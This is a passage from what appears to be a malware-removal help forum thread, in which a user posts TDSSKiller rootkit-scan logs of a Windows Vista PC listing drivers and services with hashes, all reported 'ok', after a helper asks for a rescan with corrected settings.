14:26:49.0637 1440 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
14:26:49.0667 1440 SiSRaid4 - ok
14:26:49.0777 1440 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
14:26:50.0271 1440 slsvc - ok
14:26:50.0365 1440 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
14:26:50.0424 1440 SLUINotify - ok
14:26:50.0562 1440 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
14:26:50.0624 1440 Smb - ok
14:26:50.0706 1440 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
14:26:50.0710 1440 SNMPTRAP - ok
14:26:50.0937 1440 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
14:26:51.0372 1440 SNP2UVC - ok
14:26:51.0422 1440 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
14:26:51.0445 1440 spldr - ok
14:26:51.0473 1440 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
14:26:51.0477 1440 Spooler - ok
14:26:51.0532 1440 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
14:26:51.0536 1440 srv - ok
14:26:51.0570 1440 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
14:26:51.0613 1440 srv2 - ok
14:26:51.0645 1440 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
14:26:51.0733 1440 srvnet - ok
14:26:51.0802 1440 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
14:26:51.0806 1440 SSDPSRV - ok
14:26:51.0828 1440 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
14:26:51.0884 1440 ssmdrv - ok
14:26:51.0974 1440 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
14:26:51.0977 1440 SstpSvc - ok
14:26:52.0217 1440 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
14:26:52.0230 1440 stisvc - ok
14:26:52.0243 1440 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
14:26:52.0253 1440 swenum - ok
14:26:52.0294 1440 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
14:26:52.0310 1440 swprv - ok
14:26:52.0361 1440 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
14:26:52.0380 1440 Symc8xx - ok
14:26:52.0403 1440 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
14:26:52.0427 1440 Sym_hi - ok
14:26:52.0454 1440 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
14:26:52.0486 1440 Sym_u3 - ok
14:26:52.0632 1440 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
14:26:53.0001 1440 SynTP - ok
14:26:53.0142 1440 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
14:26:53.0150 1440 SysMain - ok
14:26:53.0205 1440 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
14:26:53.0211 1440 TabletInputService - ok
14:26:53.0271 1440 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
14:26:53.0386 1440 taphss - ok
14:26:53.0464 1440 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
14:26:53.0483 1440 TapiSrv - ok
14:26:53.0539 1440 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
14:26:53.0542 1440 TBS - ok
14:26:53.0708 1440 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
14:26:54.0016 1440 Tcpip - ok
14:26:54.0140 1440 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
14:26:54.0148 1440 Tcpip6 - ok
14:26:54.0193 1440 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
14:26:54.0224 1440 tcpipreg - ok
14:26:54.0268 1440 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
14:26:54.0277 1440 TDPIPE - ok
14:26:54.0320 1440 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
14:26:54.0351 1440 TDTCP - ok
14:26:54.0383 1440 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
14:26:54.0414 1440 tdx - ok
14:26:54.0656 1440 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
14:26:54.0726 1440 TeamViewer8 - ok
14:26:54.0746 1440 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
14:26:54.0786 1440 TermDD - ok
14:26:54.0816 1440 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
14:26:54.0826 1440 TermService - ok
14:26:54.0836 1440 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
14:26:54.0846 1440 Themes - ok
14:26:54.0856 1440 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
14:26:54.0856 1440 THREADORDER - ok
14:26:54.0886 1440 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
14:26:54.0886 1440 TrkWks - ok
14:26:54.0926 1440 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
14:26:54.0926 1440 TrustedInstaller - ok
14:26:54.0976 1440 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
14:26:54.0993 1440 tssecsrv - ok
14:26:55.0018 1440 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
14:26:55.0039 1440 tunmp - ok
14:26:55.0062 1440 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
14:26:55.0091 1440 tunnel - ok
14:26:55.0121 1440 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
14:26:55.0145 1440 uagp35 - ok
14:26:55.0177 1440 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
14:26:55.0206 1440 udfs - ok
14:26:55.0232 1440 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
14:26:55.0264 1440 UI0Detect - ok
14:26:55.0299 1440 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
14:26:55.0322 1440 uliagpkx - ok
14:26:55.0350 1440 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
14:26:55.0376 1440 uliahci - ok
14:26:55.0399 1440 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
14:26:55.0442 1440 UlSata - ok
14:26:55.0472 1440 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
14:26:55.0487 1440 ulsata2 - ok
14:26:55.0509 1440 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
14:26:55.0529 1440 umbus - ok
14:26:55.0564 1440 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
14:26:55.0570 1440 upnphost - ok
14:26:55.0600 1440 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
14:26:55.0626 1440 USBAAPL - ok
14:26:55.0678 1440 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
14:26:55.0705 1440 usbccgp - ok
14:26:55.0744 1440 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
14:26:55.0767 1440 usbcir - ok
14:26:55.0847 1440 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
14:26:55.0927 1440 usbehci - ok
14:26:55.0984 1440 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
14:26:56.0067 1440 usbhub - ok
14:26:56.0125 1440 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
14:26:56.0151 1440 usbohci - ok
14:26:56.0185 1440 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
14:26:56.0230 1440 usbprint - ok
14:26:56.0285 1440 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
14:26:56.0315 1440 usbscan - ok
14:26:56.0349 1440 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
14:26:56.0375 1440 USBSTOR - ok
14:26:56.0410 1440 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
14:26:56.0428 1440 usbuhci - ok
14:26:56.0530 1440 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
14:26:56.0546 1440 usbvideo - ok
14:26:56.0587 1440 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
14:26:56.0587 1440 UxSms - ok
14:26:56.0647 1440 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
14:26:56.0687 1440 vds - ok
14:26:56.0777 1440 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
14:26:56.0797 1440 vga - ok
14:26:56.0827 1440 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
14:26:56.0857 1440 VgaSave - ok
14:26:56.0877 1440 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
14:26:56.0887 1440 viaagp - ok
14:26:56.0907 1440 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
14:26:56.0917 1440 ViaC7 - ok
14:26:56.0927 1440 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
14:26:56.0957 1440 viaide - ok
14:26:56.0987 1440 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
14:26:56.0997 1440 volmgr - ok
14:26:57.0067 1440 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
14:26:57.0097 1440 volmgrx - ok
14:26:57.0137 1440 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
14:26:57.0147 1440 volsnap - ok
14:26:57.0177 1440 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
14:26:57.0217 1440 vsmraid - ok
14:26:57.0367 1440 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
14:26:57.0407 1440 VSS - ok
14:26:57.0427 1440 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
14:26:57.0427 1440 W32Time - ok
14:26:57.0457 1440 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
14:26:57.0467 1440 WacomPen - ok
14:26:57.0507 1440 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
14:26:57.0527 1440 Wanarp - ok
14:26:57.0537 1440 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
14:26:57.0537 1440 Wanarpv6 - ok
14:26:57.0567 1440 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
14:26:57.0607 1440 wcncsvc - ok
14:26:57.0637 1440 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
14:26:57.0657 1440 WcsPlugInService - ok
14:26:57.0687 1440 [ AFC5AD65B991C1E205CF25CFDBF7A6F4 ] Wd C:\Windows\system32\drivers\wd.sys
14:26:57.0717 1440 Wd - ok
14:26:57.0777 1440 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
14:26:57.0817 1440 Wdf01000 - ok
14:26:57.0847 1440 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
14:26:57.0847 1440 WdiServiceHost - ok
14:26:57.0867 1440 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
14:26:57.0867 1440 WdiSystemHost - ok
14:26:57.0907 1440 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
14:26:57.0917 1440 WebClient - ok
14:26:57.0937 1440 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
14:26:57.0967 1440 Wecsvc - ok
14:26:57.0988 1440 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
14:26:58.0020 1440 wercplsupport - ok
14:26:58.0072 1440 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
14:26:58.0076 1440 WerSvc - ok
14:26:58.0167 1440 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
14:26:58.0181 1440 WinDefend - ok
14:26:58.0191 1440 WinHttpAutoProxySvc - ok
14:26:58.0267 1440 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
14:26:58.0269 1440 Winmgmt - ok
14:26:58.0419 1440 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
14:26:58.0475 1440 WinRM - ok
14:26:58.0544 1440 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
14:26:58.0554 1440 Wlansvc - ok
14:26:58.0574 1440 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
14:26:58.0575 1440 WmiAcpi - ok
14:26:58.0626 1440 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
14:26:58.0640 1440 wmiApSrv - ok
14:26:58.0720 1440 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
14:26:58.0739 1440 WMPNetworkSvc - ok
14:26:58.0800 1440 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
14:26:58.0837 1440 WPCSvc - ok
14:26:58.0886 1440 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
14:26:58.0890 1440 WPDBusEnum - ok
14:26:58.0941 1440 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
14:26:58.0972 1440 WpdUsb - ok
14:26:59.0276 1440 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
14:26:59.0327 1440 WPFFontCache_v0400 - ok
14:26:59.0364 1440 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
14:26:59.0389 1440 ws2ifsl - ok
14:26:59.0435 1440 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
14:26:59.0441 1440 wscsvc - ok
14:26:59.0450 1440 WSearch - ok
14:26:59.0579 1440 [ D7E88349BE0F01E4D8D776ADB1F325BF ] WTGService C:\Program Files\Verbindungsassistent\WTGService.exe
14:26:59.0585 1440 WTGService - ok
14:26:59.0666 1440 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
14:26:59.0736 1440 wuauserv - ok
14:26:59.0784 1440 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
14:26:59.0825 1440 WudfPf - ok
14:26:59.0871 1440 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
14:26:59.0903 1440 WUDFRd - ok
14:26:59.0937 1440 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
14:26:59.0943 1440 wudfsvc - ok
14:26:59.0999 1440 [ C6CA0CC2F7FCDCFE5B551335BFE6D696 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
14:27:00.0015 1440 yukonwlh - ok
14:27:00.0030 1440 ================ Scan global ===============================
14:27:00.0046 1440 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
14:27:00.0061 1440 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
14:27:00.0108 1440 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
14:27:00.0139 1440 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
14:27:00.0139 1440 [Global] - ok
14:27:00.0139 1440 ================ Scan MBR ==================================
14:27:00.0155 1440 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
14:27:01.0301 1440 \Device\Harddisk0\DR0 - ok
14:27:01.0311 1440 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
14:27:01.0321 1440 \Device\Harddisk1\DR1 - ok
14:27:01.0321 1440 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
14:27:01.0331 1440 \Device\Harddisk2\DR2 - ok
14:27:01.0331 1440 ================ Scan VBR ==================================
14:27:01.0341 1440 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
14:27:01.0341 1440 \Device\Harddisk0\DR0\Partition1 - ok
14:27:01.0381 1440 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
14:27:01.0381 1440 \Device\Harddisk0\DR0\Partition2 - ok
14:27:01.0391 1440 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
14:27:01.0391 1440 \Device\Harddisk0\DR0\Partition3 - ok
14:27:01.0401 1440 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
14:27:01.0401 1440 \Device\Harddisk1\DR1\Partition1 - ok
14:27:01.0411 1440 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
14:27:01.0411 1440 \Device\Harddisk2\DR2\Partition1 - ok
14:27:01.0411 1440 ============================================================
14:27:01.0411 1440 Scan finished
14:27:01.0411 1440 ============================================================
14:27:01.0431 3652 Detected object count: 0
14:27:01.0431 3652 Actual detected object count: 0
14:27:42.0124 4116 Deinitialize success

19.02.2013, 17:03   #10
markusg
/// Malware-holic

Hi, check the pictures in the instructions again, configure TDSSKiller and scan again.

19.02.2013, 18:05   #11
martinbu

Oh, I had overlooked that. However, once again no files were found. Here is the new log file.

Quote:
18:03:43.0871 5560 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
18:03:43.0965 5560 ============================================================
18:03:43.0965 5560 Current date / time: 2013/02/19 18:03:43.0965
18:03:43.0965 5560 SystemInfo:
18:03:43.0965 5560
18:03:43.0965 5560 OS Version: 6.0.6002 ServicePack: 2.0
18:03:43.0965 5560 Product type: Workstation
18:03:43.0966 5560 ComputerName: TUS-PC
18:03:43.0966 5560 UserName: TuS
18:03:43.0966 5560 Windows directory: C:\Windows
18:03:43.0966 5560 System windows directory: C:\Windows
18:03:43.0966 5560 Processor architecture: Intel x86
18:03:43.0966 5560 Number of processors: 2
18:03:43.0966 5560 Page size: 0x1000
18:03:43.0966 5560 Boot type: Normal boot
18:03:43.0966 5560 ============================================================
18:03:45.0317 5560 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
18:03:45.0319 5560 Drive \Device\Harddisk1\DR1 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
18:03:45.0321 5560 Drive \Device\Harddisk2\DR2 - Size: 0x1D1C0F00000 (1863.01 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
18:03:45.0322 5560 ============================================================
18:03:45.0322 5560 \Device\Harddisk0\DR0:
18:03:45.0323 5560 MBR partitions:
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x1BDC3FC1
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x1BDC4000, BlocksNum 0x200800
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x1BFC4970, BlocksNum 0x1201000
18:03:45.0323 5560 \Device\Harddisk1\DR1:
18:03:45.0324 5560 MBR partitions:
18:03:45.0324 5560 \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x3F, BlocksNum 0x3A384C02
18:03:45.0324 5560 \Device\Harddisk2\DR2:
18:03:45.0324 5560 MBR partitions:
18:03:45.0324 5560 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xE8E07000
18:03:45.0324 5560 ============================================================
18:03:45.0338 5560 C: <-> \Device\Harddisk0\DR0\Partition1
18:03:45.0365 5560 D: <-> \Device\Harddisk0\DR0\Partition2
18:03:45.0432 5560 E: <-> \Device\Harddisk0\DR0\Partition3
18:03:45.0469 5560 G: <-> \Device\Harddisk2\DR2\Partition1
18:03:45.0469 5560 H: <-> \Device\Harddisk1\DR1\Partition1
18:03:45.0469 5560 ============================================================
18:03:45.0469 5560 Initialize success
18:03:45.0469 5560 ============================================================
18:03:55.0154 5696 ============================================================
18:03:55.0154 5696 Scan started
18:03:55.0154 5696 Mode: Manual; SigCheck; TDLFS;
18:03:55.0154 5696 ============================================================
18:03:56.0339 5696 ================ Scan system memory ========================
18:03:56.0339 5696 System memory - ok
18:03:56.0339 5696 ================ Scan services =============================
18:04:01.0867 5696 BthServ - ok
18:04:01.0883 5696 [ D330803EAB2A15CAEC7F011F1D4CB30E ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
18:04:01.0914 5696 BTHUSB - ok
18:04:01.0961 5696 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
18:04:02.0007 5696 cdfs - ok
18:04:02.0054 5696 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
18:04:02.0101 5696 cdrom - ok
18:04:02.0148 5696 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
18:04:02.0195 5696 CertPropSvc - ok
18:04:02.0226 5696 [ DA8E0AFC7BAA226C538EF53AC2F90897 ] circlass C:\Windows\system32\drivers\circlass.sys
18:04:02.0273 5696 circlass - ok
18:04:02.0319 5696 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
18:04:02.0335 5696 CLFS - ok
18:04:02.0382 5696 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
18:04:02.0397 5696 clr_optimization_v2.0.50727_32 - ok
18:04:02.0453 5696 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
18:04:02.0493 5696 clr_optimization_v4.0.30319_32 - ok
18:04:02.0523 5696 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
18:04:02.0593 5696 CmBatt - ok
18:04:02.0623 5696 [ 45201046C776FFDAF3FC8A0029C581C8 ] cmdide C:\Windows\system32\drivers\cmdide.sys
18:04:02.0643 5696 cmdide - ok
18:04:02.0653 5696 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
18:04:02.0673 5696 Compbatt - ok
18:04:02.0683 5696 COMSysApp - ok
18:04:02.0683 5696 [ 2A213AE086BBEC5E937553C7D9A2B22C ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
18:04:02.0703 5696 crcdisk - ok
18:04:02.0723 5696 [ 22A7F883508176489F559EE745B5BF5D ] Crusoe C:\Windows\system32\drivers\crusoe.sys
18:04:02.0793 5696 Crusoe - ok
18:04:02.0833 5696 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
18:04:02.0873 5696 CryptSvc - ok
18:04:02.0923 5696 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
18:04:02.0973 5696 DcomLaunch - ok
18:04:03.0023 5696 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
18:04:03.0073 5696 DfsC - ok
18:04:03.0193 5696 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
18:04:03.0383 5696 DFSR - ok
18:04:03.0443 5696 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
18:04:03.0483 5696 Dhcp - ok
18:04:03.0513 5696 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
18:04:03.0543 5696 disk - ok
18:04:03.0573 5696 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
18:04:03.0643 5696 Dnscache - ok
18:04:03.0673 5696 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
18:04:03.0710 5696 dot3svc - ok
18:04:03.0762 5696 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
18:04:03.0805 5696 DPS - ok
18:04:03.0850 5696 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
18:04:03.0894 5696 drmkaud - ok
18:04:03.0926 5696 [ C68AC676B0EF30CFBB1080ADCE49EB1F ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
18:04:03.0960 5696 DXGKrnl - ok
18:04:03.0987 5696 [ F88FB26547FD2CE6D0A5AF2985892C48 ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
18:04:04.0070 5696 E1G60 - ok
18:04:04.0101 5696 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
18:04:04.0139 5696 EapHost - ok
18:04:04.0189 5696 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
18:04:04.0217 5696 Ecache - ok
18:04:04.0245 5696 [ E8F3F21A71720C84BCF423B80028359F ] elxstor C:\Windows\system32\drivers\elxstor.sys
